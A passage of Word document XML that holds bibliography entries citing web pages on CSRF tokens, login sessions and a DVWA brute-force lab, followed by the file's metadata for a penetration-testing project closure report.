    <b:Title>what-is-a-csrf-token-what-is-its-importance-and-how-does-it-work</b:Title>
    <b:InternetSiteTitle>stackoverflow.com</b:InternetSiteTitle>
    <b:Year>2015</b:Year>
    <b:Month>11</b:Month>
    <b:Day>20</b:Day>
    <b:URL>https://stackoverflow.com/questions/5207160/what-is-a-csrf-token-what-is-its-importance-and-how-does-it-work</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gre20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{16E53C42-38D2-4931-9A5D-35C9124D3332}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Greatest125</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Hatch-Python3</b:Title>
    <b:InternetSiteTitle>github.com</b:InternetSiteTitle>
    <b:Year>2020</b:Year>
    <b:Month>11</b:Month>
    <b:Day>24</b:Day>
    <b:URL>https://github.com/Greatest125/Hatch-Python3</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Daz13</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4674FAAD-F9E2-42EA-BB70-EE2C41649937}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Worrall</b:Last>
            <b:First>Daz</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>skip-login-page-if-session-exists</b:Title>
    <b:InternetSiteTitle>stackoverflow.com</b:InternetSiteTitle>
    <b:Year>2013</b:Year>
    <b:Month>08</b:Month>
    <b:Day>04</b:Day>
    <b:URL>https://stackoverflow.com/questions/18596411/skip-login-page-if-session-exists</b:URL>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>nul</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{81186E74-E5B2-42D2-996D-B1042FB8DF75}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>nu11secur1ty</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>dvwa-brute-force-high-level-anti-csrf.html</b:Title>
    <b:InternetSiteTitle>www.nu11secur1ty.com</b:InternetSiteTitle>
    <b:URL>https://www.nu11secur1ty.com/2015/11/dvwa-brute-force-high-level-anti-csrf.html</b:URL>
    <b:Year>2015</b:Year>
    <b:Month>11</b:Month>
    <b:Day>21</b:Day>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99BF4F-A1E9-4730-BD23-092CB192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7126</Words>
  <Characters>4062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PENETRATION TESTING SCENARIO</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4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TRATION TESTING SCENARIO</dc:title>
  <dc:subject>PROJECT CLOSURE REPORT</dc:subject>
  <dc:creator>David Black</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Black</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-28T13:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-31T07:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>